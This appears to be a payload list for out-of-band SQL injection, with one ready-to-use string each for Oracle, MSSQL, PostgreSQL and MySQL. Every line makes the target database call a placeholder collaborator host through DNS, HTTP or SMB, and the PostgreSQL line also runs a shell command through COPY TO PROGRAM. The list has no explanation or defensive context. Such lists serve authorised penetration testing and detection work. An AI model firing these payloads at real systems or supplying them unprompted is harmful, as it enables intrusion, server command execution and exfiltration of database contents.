SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')--
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'--
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'-- -
